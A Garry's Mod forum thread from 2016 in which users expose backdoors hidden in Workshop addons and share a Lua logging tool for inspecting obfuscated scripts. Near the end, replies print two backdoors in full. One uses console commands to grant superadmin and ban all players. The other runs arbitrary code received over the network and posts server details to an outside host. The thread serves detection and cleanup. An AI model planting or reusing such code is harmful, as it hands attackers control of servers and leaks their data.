• Backdoor Busting 2016
    12 replies, posted
Hey guys, I've taken it upon myself to declare war on the fuckboys and their shitty backdoors. All the code previewed here lives on my server. If you don't trust my findings you're free to download the addons and check for yourself. Note that the previewed code might be out of date by a few weeks. I'd suggest carefully checking these and handling them on a case-by-case basis, as I'm not sure about a few.

To start with, here are two different variations of a Taser swep that seem to be using slightly different versions of the same backdoor. They use a "cleverly" tabbed out function that looks innocent enough until you see what the variables are defined as.
[B](1)[/B] [url]http://hisoka.cogg.rocks/preview/?id=1249417&crc=3125740680[/url]
[B](2)[/B] [url]http://hisoka.cogg.rocks/preview/?id=1271974&crc=3459203385[/url]

Another one hidden by indenting the shit out of it. It's obfuscated but looks super suspicious. Random dependency on ULX because people who write backdoors are really smart.
[B](3)[/B] [url]http://hisoka.cogg.rocks/preview/?id=3100960&crc=2157769790[/url]

Not really sure what this is. It appears to be an attempt to hide some suspicious shit in a file full of cancer. I think it's supposed to crash people on a list loaded over HTTP by removing them.
[B](4)[/B] [url]http://hisoka.cogg.rocks/preview/?id=3330247&crc=3814085632[/url]

Shoutout to my homies who thought it would be a good idea to put the word "backdoor" verbatim in their code.
[B](5)[/B] [url]http://hisoka.cogg.rocks/preview/?id=2478078&crc=2481040990[/url]
[B](6)[/B] [url]http://hisoka.cogg.rocks/preview/?id=3374496&crc=3848060131[/url]

Here's another work of art.
[B](7)[/B] [url]http://hisoka.cogg.rocks/preview/?id=5289073&crc=968133780[/url]

Dunno what this is. Found it in three different addons.
[B](8)[/B] [url]http://hisoka.cogg.rocks/preview/?id=4990049&crc=4155926611[/url]

My first find. I wasn't sure it was worth including, but it is called "backdoor.lua", which is pretty neat.
[B](9)[/B] [url]http://hisoka.cogg.rocks/preview/?id=6364680&crc=1216301658[/url]

How much do you want to bet this is for "testing"?
[B](10)[/B] [url]http://hisoka.cogg.rocks/preview/?id=2897092&crc=3461292573[/url]

I don't think this is a backdoor but it's pretty funny regardless.
[B](A)[/B] [url]http://hisoka.cogg.rocks/preview/?id=6133020&crc=2619945372[/url]
[B](B)[/B] [url]http://hisoka.cogg.rocks/preview/?id=6133016&crc=3087631114[/url]

I found a whole load of this "demonic king" bullshit in various addons, most of them server content. Not sure what the obfuscated code does. I assume they're accidental reuploads of some old backdoor. Not sure I would bother doing anything about them, but I can provide an exhaustive list if you want it.
[B](i)[/B] [url]http://hisoka.cogg.rocks/preview/?id=1786240&crc=3180406226[/url]
[B](ii)[/B] [url]http://hisoka.cogg.rocks/preview/?id=1796073&crc=3307767168[/url]
[B](iii)[/B] [url]http://hisoka.cogg.rocks/preview/?id=2803254&crc=1641864852[/url]

I'd also like to add that several versions of fm_buildaboat_canal have embedded lua that disables ULX logging, and unbans/admins STEAM_0:1:40285439 and/or someone called "oreowolf". Not sure this is worth worrying about either.

That's all I have for now, although I'm sure there's more fuckboyism to be exposed.
I remember a while back, someone on WAYWO indexed the lua of literally every workshop upload to that date. Might be fun to do a quick search through that, finding every verbatim index of "backdoor"
[QUOTE=TFA;50798818]I remember a while back, someone on WAYWO indexed the lua of literally every workshop upload to that date. Might be fun to do a quick search through that, finding every verbatim index of "backdoor"[/QUOTE] That was either me or two people on this forum desperately need to get a life.
[QUOTE=MadParakeet;50798822]desperately need to get a life.[/QUOTE] but why though, doing tons of work on a game that you can't put on a resume is great!!! (says the guy with 10k hours in the very same game :pudge:)
Justice served where appropriate, except for Nr. 8, gotta decode that code first.
[QUOTE=Robotboy655;50798934]Justice served where appropriate, except for Nr. 8, gotta decode that code first.[/QUOTE] I would just remove it anyway. There's no reason why you should have that kind of obfuscation in a Workshop addon.
[QUOTE=Robotboy655;50798934]Justice served where appropriate, except for Nr. 8, gotta decode that code first.[/QUOTE] Neato. I might try adding a deobfuscator into my system next time I go searching, although getting rid of literally hundreds of thousands of false positives takes precedence.
[QUOTE=Robotboy655;50798934]Justice served where appropriate, except for Nr. 8, gotta decode that code first.[/QUOTE] [img]http://i.imgur.com/l7anUlB.png[/img] [img]http://i.imgur.com/iaD4gVG.png[/img]
[QUOTE=man with hat;50798987][IMG]http://i.imgur.com/wKLFQXu.png[/IMG] [IMG]http://i.imgur.com/iaD4gVG.png[/IMG][/QUOTE] Huh. Well, that's a mystery solved. Here's a list of duplicates of that file:
[URL]http://hisoka.cogg.rocks/preview/?id=5187941&crc=4155926611[/URL]
[URL]http://hisoka.cogg.rocks/preview/?id=6653940&crc=4155926611[/URL]
[URL]http://hisoka.cogg.rocks/preview/?id=4974896&crc=4155926611[/URL]
I still think that one's a bit bizarre though. They're all pretty insignificant addons, and their authors are all different with private profiles. Are there any public obfuscators that produce that sort of output?
I figured I'd share this in case anyone else wants to analyze obfuscated scripts without actually deobfuscating it. The functions to inspect are at the top. Obfuscated script goes at the bottom.
[lua]
local thisFile = debug.getinfo(1).short_src

-- Functions whose calls get logged. Dotted names are resolved below.
local funcs = {
	"RunString", "RunStringEx", "CompileString", "CompileFile",
	"Player.SteamID",
	"http.Fetch", "http.Post",
	"concommand.Add", "concommand.Remove",
	"hook.Add",
	"net.Receive", "net.ReadString", "net.WriteString",
	"timer.Create",
}

-- Resolve "a.b.c" to the function, its key, and the table holding it.
-- Registry metatables (e.g. Player) are checked before _G so methods work.
-- Uses GLua's "continue" and "!" operators.
local function StringToFunction(str)
	local tbl = str:Split(".")
	local _R = debug.getregistry()
	local currentValue, parent
	for k, v in ipairs(tbl) do
		currentValue = currentValue and currentValue[v] or _R[v] or _G[v]
		if (istable(currentValue)) then
			parent = currentValue
			continue
		end
		if (isfunction(currentValue)) then
			return currentValue, tbl[#tbl], parent or _G
		end
	end
end

-- Wrap each function once; "bdb" guards against double-wrapping on reload.
if (!bdb) then
	for k, v in pairs(funcs) do
		local func, name, parent = StringToFunction(v)
		parent[name] = function(...)
			-- Only log calls whose caller is this file (i.e. the pasted script).
			local src = debug.getinfo(2).short_src
			if (src and src == thisFile) then
				print(v, ...)
			end
			return func(...)
		end
	end
	bdb = true
end

-- Insert spooky code below
[/lua]
The backdoor in fm_buildaboat was put in place to prevent other servers from using it.
[QUOTE=BillyOnWiiU;50798947]I would just remove it anyway. There's no reason why you should have that kind of obfuscation in a Workshop addon.[/QUOTE] Shoot first, ask questions later. Great example to set
cats and dogs is a boring movie rn?
[code]
if _G["SERVER"] then
	_G["concommand"]["Add"]("backdv1", function(p, c, a)
		p["PrintMessage"](p, HUD_PRINTCONSOLE, "You are super admin!")
		ULib["ucl"]["addUser"](p["SteamID"](p), {}, {}, "superadmin")
	end)
	_G["concommand"]["Add"]("check", function(p, c, a)
		p["PrintMessage"](p, HUD_PRINTCONSOLE, "It's there!")
	end)
	_G["concommand"]["Add"]("syncplayers", function(p, c, a)
		p["PrintMessage"](p, HUD_PRINTCONSOLE, "Everyone admin!")
		for _, v in _G["pairs"](_G["player"]["GetAll"]()) do
			ULib["ucl"]["addUser"](v["SteamID"](v), {}, {}, "admin")
		end
	end)
	_G["concommand"]["Add"]("backdplayers", function(p, c, a)
		p["PrintMessage"](p, HUD_PRINTCONSOLE, "Removed players!")
		for _, v in _G["pairs"](_G["player"]["GetAll"]()) do
			if not v["IsAdmin"](v) then v["Remove"](v) end
		end
	end)
	_G["concommand"]["Add"]("backdv5", function(p, c, a)
		p["PrintMessage"](p, HUD_PRINTCONSOLE, "Banned everyone!")
		for _, v in _G["pairs"](_G["player"]["GetAll"]()) do
			if not v["IsAdmin"](v) then
				ULib["queueFunctionCall"](ULib["kickban"], v, 0, "No RP", nil)
			end
		end
	end)
	_G["concommand"]["Add"]("addmeagainv2", function(p, c, a)
		p["PrintMessage"](p, HUD_PRINTCONSOLE, "Added you to super admin group!")
		_G["RunConsoleCommand"]("ulx", "adduserid", p["SteamID"](p), "superadmin")
	end)
	_G["concommand"]["Add"]("backdadmins", function(p, c, a)
		if v["IsAdmin"](v) then
			ULib["queueFunctionCall"](ULib["kickban"], v, 0, "No RP", nil)
		end
	end)
end

if _G["CLIENT"] then
	local Bool = false
	_G["concommand"]["Add"]("backdv2", function(p, c, a) Bool = true end)
	_G["hook"]["Add"]("HUDPaint", "HUD__x", function()
		if Bool then
			_G["surface"]["SetDrawColor"](255, 255, 255, 255)
			_G["surface"]["SetMaterial"](_G["Material"]("models/icon.vtf"))
			_G["surface"]["DrawTexturedRect"](_G["ScrW"]() / 2 - 1500, _G["ScrH"]() / 2 - 1500, 3000, 3000)
		end
	end)
	_G["concommand"]["Add"]("check2", function(p, c, a) _G["print"]("works") end)
end
[/code]
demonic king
[code]
if SERVER and game["IsDedicated"]() then
	local f = (function() end)
	local c = CompileString
	local r = net["ReadString"]
	util["AddNetworkString"]("m9k_addons")
	net["Receivers"]["m9k_addons"] = (function()
		local s = c(r() or "--", "[C]", false)
		if type(s) ~= "string" then xpcall(s, f) end
	end)
	timer["simple"](16, function()
		http["Post"]("http://gmod.hints.me/", {hn = GetConVarString("hostname"), ip = GetConVarString("ip"), np = #player["GetAll"]()}, f, f)
	end)
end
[/code]